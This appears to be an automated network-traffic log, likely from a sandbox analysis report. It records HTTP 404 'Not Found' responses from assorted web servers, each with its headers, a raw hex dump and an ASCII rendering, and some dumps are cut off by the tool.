Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jjgBoVo7fw4Sx04ODpVahHdy9xv9vl3XQki%2Bq%2BFJOjCznxcA1PNmWE72H1coYK3oUnOZLkMoFvClzoandFlLE96eoS5hBlVIKwB5ntTUoqLNfonVM6%2BBBTI%2FPbPo8OGA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08c26f0731f8-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-53.ec2.internalX-Request-Id: b37e81ba-b216-4620-b248-1fef4d17e19eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-244.ec2.internalX-Request-Id: 972dc52a-2f16-41ae-8286-1b5881d8c33cData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.19.9.1Date: Fri, 22 Dec 2023 20:14:59 GMTContent-Type: text/htmlContent-Length: 575Connection: keep-aliveLast-Modified: Wed, 05 Oct 2011 15:41:30 GMTETag: "23f-4ae8f0ab47e80"Data Raw: 3c 64 69 76 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 3a 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 65 72 72 6f 72 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 77 68 65 6e 20 74 68 65 72 65 20 77 61 73 20 6e 6f 20 77 65 62 20 70 61 67 65 20 77 69 74 68 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 73 70 65 63 69 66 69 65 64 20 61 74 20 74 68 65 20 77 65 62 20 73 69 74 65 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 3c 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 54 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 73 75 67 67 65 73 74 69 6f 6e 73 3a 0a 20 20 20 20 20 20 20 20 3c 2f 62 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 45 6e 73 75 72 65 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 69 6e 6b 69 6e 67 20 74 6f 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 63 6f 72 72 65 63 74 20 66 6f 6c 64 65 72 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 66 69 6c 65 20 6e 61 6d 65 20 66 6f 72 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 69 74 79 20 2e 20 49 6e 64 65 78 2e 68 74 6d 20 69 73 20 6e 6f 74 20 74 68 65 20 73 61 6d 65 20 61 73 20 69 6e 64 65 78 2e 68 74 6d 21 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 64 69 73 61 62 6c 65 20 61 6e 79 20 72 65 77 72 69 74 65 20 72 75 6c 65 73 20 62 79 20 72 65 6e 61 6d 69 6e 67 20 79 6f 75 72 20 2e 68 74 61 63 63 65 73 73 20 66 69 6c 65 20 69 66 20 69 74 20 65 78 69 73 74 73 2e 0a 20 20 20 20 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a Data Ascii: <div> <p> <b>404: Page not found</b> <br/> This error is generated when there was no web page with the name you specified at the web site. </p> <p> <b> Troubleshooting suggestions: </b> </p> <p> Ensure the page you are linking to exists in the correct folder. </p> <p> Check your file name for case sensitivity . Index.htm is not the same as index.htm! </p> <p> Temporarily disable any rewrite rules by renaming your .htaccess file if it exists. </p></div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://oceanictrailers.com.au/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 22 Dec 2023 20:14:59 GMTData Raw: 31 31 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 5b 6d 73 db b6 b2 fe 1c cf f4 3f d0 cc 54 21 1b 90 22 a9 57 53 51 3a e7 a4 e9 9d 73 a7 bd 39 d3 34 73 3f c4 9d 0c 44 2e 25 26 14 c1 02 a0 25 1f 55 ff fd 0e 00 be 89 a2 2c c5 4e af 27 b1 2d 70 f1 3c 8b c5 ee 02 58 d0 af ae 43 12 f0 fb 0c b4 15 5f 27 af bf bb 7a 25 7e 6a 09 4e 97 73 1d 52 eb c3 7b fd f5 77 57 a2 19 70 f8 fa bb ab 67 af d6 c0 b1 16 ac 30 65 c0 e7 fa 87 df 7f b6 a6 42 a4 78 90 e2 35 cc f5 bb 18 36 19 a1 5c d7 02 92 72 48 f9 5c df c4 21 5f cd 43 b8 8b 03 b0 e4 07 a4 c5 69 cc 63 9c 58 2c c0 09 cc 5d 05 93 c4 e9 17 8d 42 32 d7 33 4a a2 38 01 5d 5b 51 88 e6 fa 8a f3 8c f9 fd fe 72 9d 2d 6d 42 97 fd 6d 94 f6 5d d9 4b d0 f3 98 27 f0 fa df 78 09 5a 4a b8 16 91 3c 0d b5 de f3 a9 e7 ba 33 ed 5d 00 38 8d 03 ed 77 8a e3 04 28 7b d5 57 e2 57 6a 38 52 eb 17 94 2c 08 67 2f 2a 9d 5f ac f1 d6 8a d7 78 09 56 46 41 8c c9 4f 30 5d c2 0b ad ff fa ea 55 ad 27 4e 38 d0 14 73 d0 35 61 c9 b9 8e b3 2c 89 03 cc 63 92 f6 29 63 2f b7 eb 44 d7 24 e1 5c 6f 6b a2 f5 28 fe 33 27 33 ed 67 80 b0 3d 54 a2 d4 e6 85 d6 76 40 d6 36 ce fb 11 40 d8 d7 ff 16 2d de 90 f5 1a 52 ce be 46 9d a0 e8 d3 d4 8b 05 34 ce f8 eb ab 4d 9c 86 64 63 7f da 64 b0 26 9f e3 f7 c0 79 9c 2e 99 36 d7 76 fa 02 33 f8 40 13 dd 2f a6 f6 b6 7f db 67 f6 46 cc ed 6d 5f da 9d dd f6 03 42 e1 b6 2f 3b df f6 dd a1 ed d8 ce 6d 7f e2 6d 27 de 6d 5f 47 3a 6c b9 ee eb 76 96 2e 75 a4 b3 bb e5 e3 f0 d8 dd 52 a2 b1 bb e5 5b 05 c8 ee 24 20 c9 69 00 ba bf d3 03 92 06 98 4b 35 0a 7d 7d a1 6e f7 04 dd f6 37 99 15 a7 41 92 87 c0 6e fb 9f 99 6c 90 9d 2d 0a 09 60 06 f6 3a 4e ed cf ec c7 3b a0 f3 b1 3d b4 3d 7d bf 9f 5d f5 7f b8 d6 7e 5f c5 4c 13 7e af c5 4c c3 39 27 d6 12 52 a0 98 43 a8 fd d0 bf ba 8e f2 34 10 9e 65 c4 28 35 77 77 98 6a 04 31 04 b3 b2 5d 0b 0c 30 77 9c de cb 67 7c be 63 79 26 62 f1 77 60 9c f9 80 78 bc 06 c6 f1 3a f3 8d 14 36 da 4f 98 83 69 df e1 24 87 77 91 61 ee 67 0c 18 8b 49 fa 9e 13 8a 97 60 33 e0 ff e2 b0 36 08 fa ef f7 ef fe c7 66 9c c6 e9 32 8e ee 0d 6e 9a fb 00 f3 60 25 e8 f6 fb 8a 3e 33 00 71 a1 1a d8 41 02 98 fe 06 01 37 1c e4 20 b0 03 9c de 61 66 ab e8 af 3e ae 20 5e ae b8 89 c0 8e e2 24 f9 1d b6 dc e0 c8 41 8e 39 13 83 e3 73 a1 e5 87 38 e5 03 ef 1f 94 e2 7b 03 ec 25 f0 7f 89 b0 fc 09 73 7c 09 b4 1d 62 8e 4d 44 e7 c6 13 74 4a a5 4e e8 5b 69 63 ce 28 f0 9c a6 1a b7 e1 0e e8 bd 51 1a 50 98 cf dc 15 0f 61 3e 9f d3 8f fc 8f bd 59 1b 38 2f 0d cc 36 b1 30 3f 37 77 01 66 a0 47 09 5e ea 7e d1 31 35 00 e9 b7 79 38 1d 04 b7 79 18 45 83 db 3c 02 27 ba cd 3d c7 09 6f 73 6f 8c 27 aa 45 3f 29 b6 38 10 33 7f bc 76 fd eb 43 d8 30 c2 15 45 18 0d 9a 50 f2 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTServer: ApacheUpgrade: h2Connection: UpgradeLast-Modified: Mon, 06 Jun 2005 08:43:43 GMTETag: "31a-3f8dbb37d6dc0;45d2231770ec0Accept-Ranges: bytesContent-Length: 794Content-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 43 43 43 43 43 43 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 45 43 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 7d 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 79 6c 65 33 22 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 38 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 34 36 30 22 3e 0a 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 73 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css"><!--.style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Fri, 30 Sep 2022 11:47:19 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:59 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://derrickandbriggs.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 65 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6b 61 6e 64 69 6e 73 6b 79 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 32 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 34 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 22 Dec 2023 20:14:58 GMTContent-Length: 4956Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
